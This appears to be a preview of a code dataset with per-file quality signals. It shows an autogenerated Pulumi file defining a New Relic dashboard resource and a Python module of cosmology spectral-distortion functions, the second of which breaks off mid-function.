Schema of this preview (column and dtype). Scalar and metadata columns:

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| effective | string |
| hits | int64 |

Each quality signal appears as two columns: `<name>_quality_signal` holds the measured value, and the bare `<name>` holds a 0/1 flag (dtype `null` where the flag is never populated):

| quality signal | value dtype (`…_quality_signal`) | flag dtype (bare column) |
|---|---|---|
| qsc_code_num_words | int64 | int64 |
| qsc_code_num_chars | float64 | int64 |
| qsc_code_mean_word_length | float64 | int64 |
| qsc_code_frac_words_unique | float64 | null |
| qsc_code_frac_chars_top_2grams | float64 | int64 |
| qsc_code_frac_chars_top_3grams | float64 | int64 |
| qsc_code_frac_chars_top_4grams | float64 | int64 |
| qsc_code_frac_chars_dupe_5grams | float64 | int64 |
| qsc_code_frac_chars_dupe_6grams | float64 | int64 |
| qsc_code_frac_chars_dupe_7grams | float64 | int64 |
| qsc_code_frac_chars_dupe_8grams | float64 | int64 |
| qsc_code_frac_chars_dupe_9grams | float64 | int64 |
| qsc_code_frac_chars_dupe_10grams | float64 | int64 |
| qsc_code_frac_chars_replacement_symbols | float64 | int64 |
| qsc_code_frac_chars_digital | float64 | int64 |
| qsc_code_frac_chars_whitespace | float64 | int64 |
| qsc_code_size_file_byte | float64 | int64 |
| qsc_code_num_lines | float64 | int64 |
| qsc_code_num_chars_line_max | float64 | int64 |
| qsc_code_num_chars_line_mean | float64 | int64 |
| qsc_code_frac_chars_alphabet | float64 | int64 |
| qsc_code_frac_chars_comments | float64 | int64 |
| qsc_code_cate_xml_start | float64 | int64 |
| qsc_code_frac_lines_dupe_lines | float64 | int64 |
| qsc_code_cate_autogen | float64 | int64 |
| qsc_code_frac_lines_long_string | float64 | int64 |
| qsc_code_frac_chars_string_length | float64 | int64 |
| qsc_code_frac_chars_long_word_length | float64 | int64 |
| qsc_code_frac_lines_string_concat | float64 | null |
| qsc_code_cate_encoded_data | float64 | int64 |
| qsc_code_frac_chars_hex_words | float64 | int64 |
| qsc_code_frac_lines_prompt_comments | float64 | int64 |
| qsc_code_frac_lines_assert | float64 | int64 |
| qsc_codepython_cate_ast | float64 | int64 |
| qsc_codepython_frac_lines_func_ratio | float64 | int64 |
| qsc_codepython_cate_var_zero | bool | int64 |
| qsc_codepython_frac_lines_pass | float64 | int64 |
| qsc_codepython_frac_lines_import | float64 | int64 |
| qsc_codepython_frac_lines_simplefunc | float64 | int64 |
| qsc_codepython_score_lines_no_logic | float64 | int64 |
| qsc_codepython_frac_lines_print | float64 | int64 |

In the rows below, the `max_stars_*`, `max_issues_*`, and `max_forks_*` repo fields are shown once where they coincide, and each quality signal is shown as one table row pairing its measured value with its flag.
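The three summary columns `avg_line_length`, `max_line_length`, and `alphanum_fraction` are simple functions of `content`. As an illustration only (the helper name is ours, and the exact rounding and edge-case conventions of the pipeline that produced this preview are not documented here), they could be recomputed roughly like this:

```python
# Sketch: recompute the three simple per-file statistics from a row's
# `content` field. Treat this as an approximation of the obvious
# definitions, not as the dataset's actual extraction code.
def simple_signals(content: str) -> dict:
    lines = content.splitlines()
    line_lengths = [len(line) for line in lines]
    n_chars = len(content)
    return {
        "avg_line_length": (sum(line_lengths) / len(lines)) if lines else 0.0,
        "max_line_length": max(line_lengths, default=0),
        "alphanum_fraction": (sum(c.isalnum() for c in content) / n_chars)
                             if n_chars else 0.0,
    }
```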
**Row 1**

| field | value |
|---|---|
| hexsha | db9d7715ef314df339a8867add7ea7746ef5a183 |
| size | 22,687 |
| ext | py |
| lang | Python |
| repo_path (stars/issues/forks) | sdk/python/pulumi_newrelic/one_dashboard_raw.py |
| repo_name (stars/issues/forks) | pulumi/pulumi-newrelic |
| repo_head_hexsha (stars/issues/forks) | cd9a882f3524883ed155f87ff26c4c17cd048c9a |
| repo_licenses (stars/issues/forks) | ["ECL-2.0", "Apache-2.0"] |

| event group | count | event_min_datetime | event_max_datetime |
|---|---|---|---|
| max_stars | 6 | 2019-09-17T20:41:26.000Z | 2022-01-13T23:54:14.000Z |
| max_issues | 136 | 2019-04-29T21:34:57.000Z | 2022-03-30T17:07:03.000Z |
| max_forks | 3 | 2019-10-05T10:33:59.000Z | 2021-06-15T16:37:49.000Z |

content:

````python
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['OneDashboardRawArgs', 'OneDashboardRaw']
@pulumi.input_type
class OneDashboardRawArgs:
def __init__(__self__, *,
pages: pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]],
account_id: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
permissions: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a OneDashboardRaw resource.
:param pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]] pages: A nested block that describes a page. See Nested page blocks below for details.
:param pulumi.Input[int] account_id: Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
:param pulumi.Input[str] description: Brief text describing the dashboard.
:param pulumi.Input[str] name: The title of the dashboard.
:param pulumi.Input[str] permissions: Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
pulumi.set(__self__, "pages", pages)
if account_id is not None:
pulumi.set(__self__, "account_id", account_id)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if permissions is not None:
pulumi.set(__self__, "permissions", permissions)
@property
@pulumi.getter
def pages(self) -> pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]]:
"""
A nested block that describes a page. See Nested page blocks below for details.
"""
return pulumi.get(self, "pages")
@pages.setter
def pages(self, value: pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]]):
pulumi.set(self, "pages", value)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> Optional[pulumi.Input[int]]:
"""
Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Brief text describing the dashboard.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The title of the dashboard.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def permissions(self) -> Optional[pulumi.Input[str]]:
"""
Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
return pulumi.get(self, "permissions")
@permissions.setter
def permissions(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permissions", value)
@pulumi.input_type
class _OneDashboardRawState:
def __init__(__self__, *,
account_id: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
guid: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pages: Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]]] = None,
permalink: Optional[pulumi.Input[str]] = None,
permissions: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering OneDashboardRaw resources.
:param pulumi.Input[int] account_id: Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
:param pulumi.Input[str] description: Brief text describing the dashboard.
:param pulumi.Input[str] guid: The unique entity identifier of the dashboard page in New Relic.
:param pulumi.Input[str] name: The title of the dashboard.
:param pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]] pages: A nested block that describes a page. See Nested page blocks below for details.
:param pulumi.Input[str] permalink: The URL for viewing the dashboard.
:param pulumi.Input[str] permissions: Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
if account_id is not None:
pulumi.set(__self__, "account_id", account_id)
if description is not None:
pulumi.set(__self__, "description", description)
if guid is not None:
pulumi.set(__self__, "guid", guid)
if name is not None:
pulumi.set(__self__, "name", name)
if pages is not None:
pulumi.set(__self__, "pages", pages)
if permalink is not None:
pulumi.set(__self__, "permalink", permalink)
if permissions is not None:
pulumi.set(__self__, "permissions", permissions)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> Optional[pulumi.Input[int]]:
"""
Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Brief text describing the dashboard.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def guid(self) -> Optional[pulumi.Input[str]]:
"""
The unique entity identifier of the dashboard page in New Relic.
"""
return pulumi.get(self, "guid")
@guid.setter
def guid(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "guid", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The title of the dashboard.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def pages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]]]:
"""
A nested block that describes a page. See Nested page blocks below for details.
"""
return pulumi.get(self, "pages")
@pages.setter
def pages(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OneDashboardRawPageArgs']]]]):
pulumi.set(self, "pages", value)
@property
@pulumi.getter
def permalink(self) -> Optional[pulumi.Input[str]]:
"""
The URL for viewing the dashboard.
"""
return pulumi.get(self, "permalink")
@permalink.setter
def permalink(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permalink", value)
@property
@pulumi.getter
def permissions(self) -> Optional[pulumi.Input[str]]:
"""
Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
return pulumi.get(self, "permissions")
@permissions.setter
def permissions(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permissions", value)
class OneDashboardRaw(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OneDashboardRawPageArgs']]]]] = None,
permissions: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## Example Usage
### Create A New Relic One Dashboard With RawConfiguration
```python
import pulumi
import json
import pulumi_newrelic as newrelic
exampledash = newrelic.OneDashboardRaw("exampledash", pages=[newrelic.OneDashboardRawPageArgs(
name="Page Name",
widgets=[
newrelic.OneDashboardRawPageWidgetArgs(
title="Custom widget",
row=1,
column=1,
width=1,
height=1,
visualization_id="viz.custom",
configuration=\"\"\" {
"legend": {
"enabled": false
},
"nrqlQueries": [
{
"accountId": ` + accountID + `,
"query": "SELECT average(loadAverageOneMinute), average(loadAverageFiveMinute), average(loadAverageFifteenMinute) from SystemSample SINCE 60 minutes ago TIMESERIES"
}
],
"yAxisLeft": {
"max": 100,
"min": 50,
"zero": false
}
}
\"\"\",
),
newrelic.OneDashboardRawPageWidgetArgs(
title="Server CPU",
row=1,
column=2,
width=1,
height=1,
visualization_id="viz.testing",
configuration=\"\"\" {
"nrqlQueries": [
{
"accountId": ` + accountID + `,
"query": "SELECT average(cpuPercent) FROM SystemSample since 3 hours ago facet hostname limit 400"
}
]
}
\"\"\",
),
newrelic.OneDashboardRawPageWidgetArgs(
title="Docker Server CPU",
row=1,
column=3,
height=1,
width=1,
visualization_id="viz.bar",
configuration=json.dumps({
"facet": {
"showOtherSeries": False,
},
"nrqlQueries": [{
"accountId": local["accountID"],
"query": "SELECT average(cpuPercent) FROM SystemSample since 3 hours ago facet hostname limit 400",
}],
}),
linked_entity_guids=["MzI5ODAxNnxWSVp8REFTSEJPQVJEfDI2MTcxNDc"],
),
],
)])
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] account_id: Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
:param pulumi.Input[str] description: Brief text describing the dashboard.
:param pulumi.Input[str] name: The title of the dashboard.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OneDashboardRawPageArgs']]]] pages: A nested block that describes a page. See Nested page blocks below for details.
:param pulumi.Input[str] permissions: Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: OneDashboardRawArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Example Usage
### Create A New Relic One Dashboard With RawConfiguration
```python
import pulumi
import json
import pulumi_newrelic as newrelic
exampledash = newrelic.OneDashboardRaw("exampledash", pages=[newrelic.OneDashboardRawPageArgs(
name="Page Name",
widgets=[
newrelic.OneDashboardRawPageWidgetArgs(
title="Custom widget",
row=1,
column=1,
width=1,
height=1,
visualization_id="viz.custom",
configuration=\"\"\" {
"legend": {
"enabled": false
},
"nrqlQueries": [
{
"accountId": ` + accountID + `,
"query": "SELECT average(loadAverageOneMinute), average(loadAverageFiveMinute), average(loadAverageFifteenMinute) from SystemSample SINCE 60 minutes ago TIMESERIES"
}
],
"yAxisLeft": {
"max": 100,
"min": 50,
"zero": false
}
}
\"\"\",
),
newrelic.OneDashboardRawPageWidgetArgs(
title="Server CPU",
row=1,
column=2,
width=1,
height=1,
visualization_id="viz.testing",
configuration=\"\"\" {
"nrqlQueries": [
{
"accountId": ` + accountID + `,
"query": "SELECT average(cpuPercent) FROM SystemSample since 3 hours ago facet hostname limit 400"
}
]
}
\"\"\",
),
newrelic.OneDashboardRawPageWidgetArgs(
title="Docker Server CPU",
row=1,
column=3,
height=1,
width=1,
visualization_id="viz.bar",
configuration=json.dumps({
"facet": {
"showOtherSeries": False,
},
"nrqlQueries": [{
"accountId": local["accountID"],
"query": "SELECT average(cpuPercent) FROM SystemSample since 3 hours ago facet hostname limit 400",
}],
}),
linked_entity_guids=["MzI5ODAxNnxWSVp8REFTSEJPQVJEfDI2MTcxNDc"],
),
],
)])
```
:param str resource_name: The name of the resource.
:param OneDashboardRawArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(OneDashboardRawArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OneDashboardRawPageArgs']]]]] = None,
permissions: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = OneDashboardRawArgs.__new__(OneDashboardRawArgs)
__props__.__dict__["account_id"] = account_id
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
if pages is None and not opts.urn:
raise TypeError("Missing required property 'pages'")
__props__.__dict__["pages"] = pages
__props__.__dict__["permissions"] = permissions
__props__.__dict__["guid"] = None
__props__.__dict__["permalink"] = None
super(OneDashboardRaw, __self__).__init__(
'newrelic:index/oneDashboardRaw:OneDashboardRaw',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
description: Optional[pulumi.Input[str]] = None,
guid: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OneDashboardRawPageArgs']]]]] = None,
permalink: Optional[pulumi.Input[str]] = None,
permissions: Optional[pulumi.Input[str]] = None) -> 'OneDashboardRaw':
"""
Get an existing OneDashboardRaw resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] account_id: Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
:param pulumi.Input[str] description: Brief text describing the dashboard.
:param pulumi.Input[str] guid: The unique entity identifier of the dashboard page in New Relic.
:param pulumi.Input[str] name: The title of the dashboard.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OneDashboardRawPageArgs']]]] pages: A nested block that describes a page. See Nested page blocks below for details.
:param pulumi.Input[str] permalink: The URL for viewing the dashboard.
:param pulumi.Input[str] permissions: Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _OneDashboardRawState.__new__(_OneDashboardRawState)
__props__.__dict__["account_id"] = account_id
__props__.__dict__["description"] = description
__props__.__dict__["guid"] = guid
__props__.__dict__["name"] = name
__props__.__dict__["pages"] = pages
__props__.__dict__["permalink"] = permalink
__props__.__dict__["permissions"] = permissions
return OneDashboardRaw(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> pulumi.Output[int]:
"""
Determines the New Relic account where the dashboard will be created. Defaults to the account associated with the API key used.
"""
return pulumi.get(self, "account_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Brief text describing the dashboard.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def guid(self) -> pulumi.Output[str]:
"""
The unique entity identifier of the dashboard page in New Relic.
"""
return pulumi.get(self, "guid")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The title of the dashboard.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def pages(self) -> pulumi.Output[Sequence['outputs.OneDashboardRawPage']]:
"""
A nested block that describes a page. See Nested page blocks below for details.
"""
return pulumi.get(self, "pages")
@property
@pulumi.getter
def permalink(self) -> pulumi.Output[str]:
"""
The URL for viewing the dashboard.
"""
return pulumi.get(self, "permalink")
@property
@pulumi.getter
def permissions(self) -> pulumi.Output[Optional[str]]:
"""
Determines who can see the dashboard in an account. Valid values are `private`, `public_read_only`, or `public_read_write`. Defaults to `public_read_only`.
"""
return pulumi.get(self, "permissions")
````

avg_line_length: 41.935305, max_line_length: 201, alphanum_fraction: 0.5869

| quality signal | value | flag |
|---|---|---|
| qsc_code_num_words | 2,297 | 0 |
| qsc_code_num_chars | 22,687 | 0 |
| qsc_code_mean_word_length | 5.626469 | 0 |
| qsc_code_frac_words_unique | 0.101872 | null |
| qsc_code_frac_chars_top_2grams | 0.080006 | 0 |
| qsc_code_frac_chars_top_3grams | 0.057413 | 0 |
| qsc_code_frac_chars_top_4grams | 0.059579 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.840761 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.824513 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.789307 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.778087 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.774141 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.763541 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.003908 | 0 |
| qsc_code_frac_chars_whitespace | 0.311985 | 0 |
| qsc_code_size_file_byte | 22,687 | 0 |
| qsc_code_num_lines | 540 | 0 |
| qsc_code_num_chars_line_max | 202 | 0 |
| qsc_code_num_chars_line_mean | 42.012963 | 0 |
| qsc_code_frac_chars_alphabet | 0.824076 | 0 |
| qsc_code_frac_chars_comments | 0.430996 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.690377 | 0 |
| qsc_code_cate_autogen | 1 | 1 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.090859 | 0 |
| qsc_code_frac_chars_long_word_length | 0.02562 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.158996 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0.004184 | 0 |
| qsc_codepython_frac_lines_import | 0.029289 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.284519 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |

effective: 0, hits: 7
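Read together with the schema, the value/flag pairing supports a straightforward filtering workflow. A hedged sketch, assuming the preview is backed by a pandas-loadable table (the file name below is hypothetical; the preview does not name its backing file):

```python
import pandas as pd

# Hypothetical path: substitute whatever file actually backs this preview.
df = pd.read_parquet("data.parquet")

# Keep files that trip no duplicate-n-gram flags and are not autogenerated.
# The bare qsc_* columns are the 0/1 trigger flags described in the schema.
dupe_flags = [f"qsc_code_frac_chars_dupe_{n}grams" for n in range(5, 11)]
mask = (df[dupe_flags].sum(axis=1) == 0) & (df["qsc_code_cate_autogen"] == 0)
clean = df[mask]
print(len(clean), "of", len(df), "files pass")
```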
**Row 2**

| field | value |
|---|---|
| hexsha | dbb52b980ba9d32d4d1219e0aa8f1525bc4603bc |
| size | 6,042 |
| ext | py |
| lang | Python |
| repo_path (stars/issues/forks) | specdist/specdist_functions.py |
| repo_name (stars) | borisbolliet/pi_spec |
| repo_name (issues/forks) | borisbolliet/specdist |
| repo_head_hexsha (stars/issues/forks) | 88c96f86253b4e719fe31642f3d779e1f4ae576b |
| repo_licenses (stars/issues/forks) | ["MIT"] |

| event group | count | event_min_datetime | event_max_datetime |
|---|---|---|---|
| max_stars | 1 | 2021-11-03T16:11:37.000Z | 2021-11-03T16:11:37.000Z |
| max_issues | null | null | null |
| max_forks | null | null | null |

content:

````python
from .utils import *
from .cosmology import *
def redshift_z_mu(cosmo):
#see eq. 4.47 of https://physique.cuso.ch/fileadmin/physique/document/2014_Chluba_notes.pdf
#this assumes N_eff = 3.046
#this is only the double compton thermalization redshift
#return 1.98e6*(cosmo.omega_b/0.022)**-(2./5.)*((1.-cosmo.Yp/2.)/0.88)**-(2./5.)*(cosmo.T_cmb/2.725)**(1./5.)
return 1.98e6
def visibility_J_bb(z,cosmo):
#eq. 4.46 of https://physique.cuso.ch/fileadmin/physique/document/2014_Chluba_notes.pdf
#this is assuming DC only
#z = np.asarray(z)
try:
result = np.exp(-(z/redshift_z_mu(cosmo))**(5./2.))
except:
result = 0.
if math.isnan(result):
result = 0.
return result
def visibility_J_bb_star(z,cosmo):
#see eq. 13 of https://arxiv.org/pdf/1506.06582.pdf
try:
result = 0.983*visibility_J_bb(z,cosmo)*(1.-0.0381*(z/redshift_z_mu(cosmo))**2.29)
except:
result = 0.
if math.isnan(result):
result = 0.
return result
def visibility_J_y(z,cosmo):
#see eq. 5 of https://arxiv.org/pdf/1304.6120.pdf
#z = np.asarray(z)
result = (1.+((1.+z)/6e4)**2.58)**-1.
if math.isnan(result):
result = 0.
return result
def visibility_J_mu(z,cosmo):
#see eq. 5 of https://arxiv.org/pdf/1304.6120.pdf
try:
result = 1.-np.exp(-((1.+z)/5.8e4)**1.88)
except:
result = 0.
if math.isnan(result):
result = 0.
return result
def visibility_J_T(z,cosmo):
#see eq. 5 of https://arxiv.org/pdf/1304.6120.pdf
result = 1.-visibility_J_bb_star(z,cosmo)
if math.isnan(result):
result = 0.
return result
def critical_frequency_x_c_br(z):
#eq. 4.39 of https://physique.cuso.ch/fileadmin/physique/document/2014_Chluba_notes.pdf
#assumes Itoh et al BR treatment
return 1.23e-3*((1.+z)/2e6)**-0.672
def critical_frequency_x_c_dc(z):
#eq. 4.38 of https://physique.cuso.ch/fileadmin/physique/document/2014_Chluba_notes.pdf
#assumes DC Gaunt factors are negligible
return 8.60e-3*((1.+z)/2e6)**0.5
def critical_frequency_x_c(z):
return np.sqrt(critical_frequency_x_c_br(z)**2.+critical_frequency_x_c_dc(z)**2.)
def mu_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs):
def integrand(ln1pz,*args):
z = np.exp(ln1pz)-1.
J_bb = visibility_J_bb(z,args[0])
J_mu = visibility_J_mu(z,args[0])
dt_dln1pz = -1./cosmo.E(z)/args[0].H0()
dlnrho_dln1pz = energy_release_history_dlnrho_dt(z,args[0],**args[1])*dt_dln1pz
result = 3./kappa_c*J_bb*J_mu*dlnrho_dln1pz
return result
#trapezoidal rule
nz = int(50)
ln1pz_array = np.linspace((np.log(1.+cosmo.z_start)),(np.log(1.+cosmo.z_end)),nz)
Ip = []
int_array_xp = []
a_args = (cosmo,kwargs)
for p in ln1pz_array:
int_p = integrand(p,*a_args)
int_array_xp.append(int_p)
int_array_xp=np.asarray(int_array_xp)
Ip = np.trapz(int_array_xp,ln1pz_array)
result = (Ip,0.)
####end trapezoidal rule
#result = quad(integrand,np.log(1.+cosmo.z_start),np.log(1.+cosmo.z_end), args=(cosmo,kwargs))
r_dict = {}
r_dict['value']=result[0]
r_dict['err'] = result[1]
return r_dict
def y_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs):
def integrand(ln1pz,*args):
z = np.exp(ln1pz)-1.
J_bb = visibility_J_bb(z,args[0])
J_y = visibility_J_y(z,args[0])
dt_dln1pz = -1./cosmo.E(z)/args[0].H0()
dlnrho_dln1pz = energy_release_history_dlnrho_dt(z,args[0],**args[1])*dt_dln1pz
result = J_bb*J_y*dlnrho_dln1pz/4.
return result
#trapezoidal rule
nz = int(50)
ln1pz_array = np.linspace((np.log(1.+cosmo.z_start)),(np.log(1.+cosmo.z_end)),nz)
Ip = []
int_array_xp = []
a_args = (cosmo,kwargs)
for p in ln1pz_array:
int_p = integrand(p,*a_args)
int_array_xp.append(int_p)
int_array_xp=np.asarray(int_array_xp)
Ip = np.trapz(int_array_xp,ln1pz_array)
result = (Ip,0.)
####end trapezoidal rule
#result = quad(integrand,np.log(1.+cosmo.z_start),np.log(1.+cosmo.z_end), args=(cosmo,kwargs))
r_dict = {}
r_dict['value']=result[0]
r_dict['err'] = result[1]
return r_dict
def Drho_rho_y_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs):
return y_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs)['value']*4.
def Drho_rho_mu_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs):
return mu_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs)['value']/(3./kappa_c)
def Drho_rho_tot_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs):
return Drho_rho_y_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs)+Drho_rho_mu_from_energy_release_history(energy_release_history_dlnrho_dt,cosmo,**kwargs)
def DN_N_from_entropy_production_history(entropy_production_history_dlnN_dt,cosmo,**kwargs):
def integrand(ln1pz,*args):
z = np.exp(ln1pz)-1.
# J_bb = visibility_J_bb(z,args[0])
# J_y = visibility_J_y(z,args[0])
dt_dln1pz = -1./cosmo.E(z)/args[0].H0()
dlnN_dln1pz = entropy_production_history_dlnN_dt(z,args[0],**args[1])*dt_dln1pz
result = dlnN_dln1pz
return result
#trapezoidal rule
nz = int(50)
ln1pz_array = np.linspace((np.log(1.+cosmo.z_start)),(np.log(1.+cosmo.z_end)),nz)
Ip = []
int_array_xp = []
a_args = (cosmo,kwargs)
for p in ln1pz_array:
int_p = integrand(p,*a_args)
int_array_xp.append(int_p)
int_array_xp=np.asarray(int_array_xp)
Ip = np.trapz(int_array_xp,ln1pz_array)
result = (Ip,0.)
####end trapezoidal rule
